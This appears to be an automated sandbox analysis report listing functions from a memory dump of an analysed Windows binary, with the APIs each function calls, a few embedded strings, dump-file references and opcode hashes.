                                                            Function 00D49113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$_memset
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2862541840-625585964
                                                            • Opcode ID: 717f36cb8ee2cc8847b42748b2f4b4e06b758ef130fa4049bcaffb49b23a5790
                                                            • Instruction ID: 1acc56e0c22e89a1b51f9e8432b219a3ec7fca34eb4e74c8c754cc247488f394
                                                            • Opcode Fuzzy Hash: 717f36cb8ee2cc8847b42748b2f4b4e06b758ef130fa4049bcaffb49b23a5790
                                                            • Instruction Fuzzy Hash: 9D918E71A00219ABDF24DFA6C898FAFB7B8EF45710F148159F915AB280D7709945CFB0
                                                            Function 00D4975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D2710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?,?,?,00D27455), ref: 00D27127
                                                              • Part of subcall function 00D2710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?,?), ref: 00D27142
                                                              • Part of subcall function 00D2710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?,?), ref: 00D27150
                                                              • Part of subcall function 00D2710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D27044,80070057,?), ref: 00D27160
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00D49806
                                                            • _memset.LIBCMT ref: 00D49813
                                                            • _memset.LIBCMT ref: 00D49956
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00D49982
                                                            • CoTaskMemFree.OLE32(?), ref: 00D4998D
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 00D499DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1300414916-2785691316
                                                            • Opcode ID: b2985923ab79fb8f884d118afb70d1c7d4721cb079ce3786e2712d18727edfd7
                                                            • Instruction ID: a7cb03e26d16173a319c893194df2afde5c67fb1136a080d7a16743bbc94e261
                                                            • Opcode Fuzzy Hash: b2985923ab79fb8f884d118afb70d1c7d4721cb079ce3786e2712d18727edfd7
                                                            • Instruction Fuzzy Hash: 6C914771D00229EBDB10DFA5DC95EDEBBB9EF08310F20415AF519A7281EB319A44CFA0
                                                            Function 00D4E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D33C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00D33C7A
                                                              • Part of subcall function 00D33C55: Process32FirstW.KERNEL32(00000000,?), ref: 00D33C88
                                                              • Part of subcall function 00D33C55: CloseHandle.KERNEL32(00000000), ref: 00D33D52
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D4E9A4
                                                            • GetLastError.KERNEL32 ref: 00D4E9B7
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D4E9E6
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D4EA63
                                                            • GetLastError.KERNEL32(00000000), ref: 00D4EA6E
                                                            • CloseHandle.KERNEL32(00000000), ref: 00D4EAA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: b63d5dfcf5e8f774a71c2647a84b709fc7a0c01ff4f87700a528fa3dadc85000
                                                            • Instruction ID: fd2947afcaf9cef874fe8144b1236a8178cfb4967f89a9d4718dbdd62b257d22
                                                            • Opcode Fuzzy Hash: b63d5dfcf5e8f774a71c2647a84b709fc7a0c01ff4f87700a528fa3dadc85000
                                                            • Instruction Fuzzy Hash: 63415671200301AFEB15EF24DC96F6EBBA5BF40714F188459FA429B3D2CB75A904DBA1
                                                            Function 00D5B69E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(00D957B0,00000000,01406658,?,?,00D957B0,?,00D5B5A8,?,?), ref: 00D5B712
                                                            • EnableWindow.USER32(00000000,00000000), ref: 00D5B736
                                                            • ShowWindow.USER32(00D957B0,00000000,01406658,?,?,00D957B0,?,00D5B5A8,?,?), ref: 00D5B796
                                                            • ShowWindow.USER32(00000000,00000004,?,00D5B5A8,?,?), ref: 00D5B7A8
                                                            • EnableWindow.USER32(00000000,00000001), ref: 00D5B7CC
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00D5B7EF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 642888154-2594219639
                                                            • Opcode ID: c7cb9a9b5aa562246130d0e20bf12a09797c6676ef0682f9a443ec3f27fdfd34
                                                            • Instruction ID: 29d63f791e5617887f013583098c8947b3b8bf63fbf1c3dae193740d2b6f9f18
                                                            • Opcode Fuzzy Hash: c7cb9a9b5aa562246130d0e20bf12a09797c6676ef0682f9a443ec3f27fdfd34
                                                            • Instruction Fuzzy Hash: 2A414534500344AFDF25CF24C499B957BE1FB49362F2C41B6ED588F662C731A85ACB61
                                                            Function 00D32F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00D33033
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: c10f0d5d60521510f2f625de1bead42662e42adbef8ac06bebe07f19b7b7edb0
                                                            • Instruction ID: 3a31f23432f6d7860b0b9204bb4315434a9d01404d6ab6739fda743512d0782c
                                                            • Opcode Fuzzy Hash: c10f0d5d60521510f2f625de1bead42662e42adbef8ac06bebe07f19b7b7edb0
                                                            • Instruction Fuzzy Hash: 6A11D53164C34ABEE728AF54DC82C7B679C9F15361F24006AFA00A6281DB619F4466B5
                                                            Function 00D342F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00D34312
                                                            • LoadStringW.USER32(00000000), ref: 00D34319
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00D3432F
                                                            • LoadStringW.USER32(00000000), ref: 00D34336
                                                            • _wprintf.LIBCMT ref: 00D3435C
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D3437A
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00D34357
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: ec93a1fc77cb9ad7e57bde9da19da528a976346529926c4b8fc1dd06bd09c8a5
                                                            • Instruction ID: c39def885860542054a857efb70e68639d222c9e28008bac411a85384c929bd2
                                                            • Opcode Fuzzy Hash: ec93a1fc77cb9ad7e57bde9da19da528a976346529926c4b8fc1dd06bd09c8a5
                                                            • Instruction Fuzzy Hash: 8A01A2F2800308BFE750A7A0DD89EFB776CDB08302F0001A1BB45E6111EA349E844B70
                                                            Function 00CD2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00D0C1C7,00000004,00000000,00000000,00000000), ref: 00CD2ACF
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00D0C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00CD2B17
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00D0C1C7,00000004,00000000,00000000,00000000), ref: 00D0C21A
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00D0C1C7,00000004,00000000,00000000,00000000), ref: 00D0C286
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: 37840f2394e395a910d5a7de83c056c4065d51d9b5fb7528c30077ccd9cb4850
                                                            • Instruction ID: 9e0a5a83d6bff7fea21cab35410b11074faa93042d95a88309b125222bdca07e
                                                            • Opcode Fuzzy Hash: 37840f2394e395a910d5a7de83c056c4065d51d9b5fb7528c30077ccd9cb4850
                                                            • Instruction Fuzzy Hash: E3411630718780ABCB359B399C88B6B7B92EB65310F58891FE65F867A0C670D941F730
                                                            Function 00D370C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00D370DD
                                                              • Part of subcall function 00CF0DB6: std::exception::exception.LIBCMT ref: 00CF0DEC
                                                              • Part of subcall function 00CF0DB6: __CxxThrowException@8.LIBCMT ref: 00CF0E01
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00D37114
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00D37130
                                                            • _memmove.LIBCMT ref: 00D3717E
                                                            • _memmove.LIBCMT ref: 00D3719B
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00D371AA
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00D371BF
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00D371DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 256516436-0
                                                            • Opcode ID: ad954cf5ea888e125d33662a72784fc89c8502edd53cc76853356681feb4536c
                                                            • Instruction ID: 503a4cec4aced73ceee503b15c52d21c49a1080c785ffdaa48b889f8ac85e8c6
                                                            • Opcode Fuzzy Hash: ad954cf5ea888e125d33662a72784fc89c8502edd53cc76853356681feb4536c
                                                            • Instruction Fuzzy Hash: E8316E76900309EBCF50DFA4DC85AAABB78EF45710F2441A5EE04EB246DB309A10DBB1
                                                            Function 00D2BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: dc16ce3f1a544e748584c10179d16ef81e00da9acb0376e7b88b915ea0e174ab
                                                            • Instruction ID: 70611c1928aeaa56915eb6713eb236764c99e73c48e1df108b2022e789621056
                                                            • Opcode Fuzzy Hash: dc16ce3f1a544e748584c10179d16ef81e00da9acb0376e7b88b915ea0e174ab
                                                            • Instruction Fuzzy Hash: E321FC7160162A7FE2046621BD42FFB7B5C9E7037CF0C4022FE0456587EBA5DE15A5B2
                                                            Function 00D3EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                              • Part of subcall function 00CEFC86: _wcscpy.LIBCMT ref: 00CEFCA9
                                                            • _wcstok.LIBCMT ref: 00D3EC94
                                                            • _wcscpy.LIBCMT ref: 00D3ED23
                                                            • _memset.LIBCMT ref: 00D3ED56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            • API String ID: 774024439-3081909835
                                                            • Opcode ID: e80c0655e78fa496a4a2f55580f30d1a2bb7db4726f399a618802d36d922ab2e
                                                            • Instruction ID: cb72adaafad5435534996bf703dbb460099924b83329b32cc386543a06d379b8
                                                            • Opcode Fuzzy Hash: e80c0655e78fa496a4a2f55580f30d1a2bb7db4726f399a618802d36d922ab2e
                                                            • Instruction Fuzzy Hash: 2CC16C755083009FC764EF24D885A6AB7E0EF85310F14492EF9999B3E2DB70EC45DB92
                                                            Function 00D46B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00D46C00
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00D46C21
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D46C34
                                                            • htons.WSOCK32(?), ref: 00D46CEA
                                                            • inet_ntoa.WSOCK32(?), ref: 00D46CA7
                                                              • Part of subcall function 00D2A7E9: _strlen.LIBCMT ref: 00D2A7F3
                                                              • Part of subcall function 00D2A7E9: _memmove.LIBCMT ref: 00D2A815
                                                            • _strlen.LIBCMT ref: 00D46D44
                                                            • _memmove.LIBCMT ref: 00D46DAD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                            • String ID:
                                                            • API String ID: 3619996494-0
                                                            • Opcode ID: 7a13398f3b48dafd4a391da59af024324c37c194d8324b0b31c2c6baca5b8be7
                                                            • Instruction ID: b77516561fa0c64a8240acf00c927eb5333c2ab1f59e75e017fd048a1f3cd7e4
                                                            • Opcode Fuzzy Hash: 7a13398f3b48dafd4a391da59af024324c37c194d8324b0b31c2c6baca5b8be7
                                                            • Instruction Fuzzy Hash: DF81DF71604300ABC710EF24CC82E6AB7A9EF85714F14491EFA569B3D2DB70ED05CBA2
                                                            Function 00CD1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cca04158602cf95c8ba30dbc89f565f5c64a93862af96ea4f1902875554d2ada
                                                            • Instruction ID: 8a58b88f5a2db988fad94362ce0cf416faa534a0804bdbc3b7ef19b192eae1ec
                                                            • Opcode Fuzzy Hash: cca04158602cf95c8ba30dbc89f565f5c64a93862af96ea4f1902875554d2ada
                                                            • Instruction Fuzzy Hash: 4B715E30900209FFCB149F99CC85ABE7BB5FF85325F18815AFA15AB351D7349A51CB60
                                                            Function 00D4F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D4F448
                                                            • _memset.LIBCMT ref: 00D4F511
                                                            • ShellExecuteExW.SHELL32(?), ref: 00D4F556
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                              • Part of subcall function 00CEFC86: _wcscpy.LIBCMT ref: 00CEFCA9
                                                            • GetProcessId.KERNEL32(00000000), ref: 00D4F5CD
                                                            • CloseHandle.KERNEL32(00000000), ref: 00D4F5FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                            • String ID: @
                                                            • API String ID: 3522835683-2766056989
                                                            • Opcode ID: be61154f457d7b31f4b43f4b78a3d816a85f8faba7318374b44edbf6b85403d0
                                                            • Instruction ID: 708c2f26f7f6246ff1a7de6d27d6ad2b8f64f0ba3b37eaf177df09cacb276d3d
                                                            • Opcode Fuzzy Hash: be61154f457d7b31f4b43f4b78a3d816a85f8faba7318374b44edbf6b85403d0
                                                            • Instruction Fuzzy Hash: 1F619275A00619DFCF14DF54C8819AEBBF5FF49310F14806AE959AB361CB30AD41DBA0
                                                            Function 00D30F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 00D30F8C
                                                            • GetKeyboardState.USER32(?), ref: 00D30FA1
                                                            • SetKeyboardState.USER32(?), ref: 00D31002
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00D31030
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00D3104F
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00D31095
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00D310B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: e19c196006de46151b0b2e6c3e7a1c5b10dc58a736bbaee63c3bc754603a3448
                                                            • Instruction ID: 01d399d6d82c16f0ded86c54e96aad50d41587810880100aac0a98d1ae196bb4
                                                            • Opcode Fuzzy Hash: e19c196006de46151b0b2e6c3e7a1c5b10dc58a736bbaee63c3bc754603a3448
                                                            • Instruction Fuzzy Hash: C251C0A46047D63DFB3642348C56BBABFA95B06304F0C8989E1D58A8D2C2D9ECD8D771
                                                            Function 00D30D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 00D30DA5
                                                            • GetKeyboardState.USER32(?), ref: 00D30DBA
                                                            • SetKeyboardState.USER32(?), ref: 00D30E1B
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00D30E47
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00D30E64
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00D30EA8
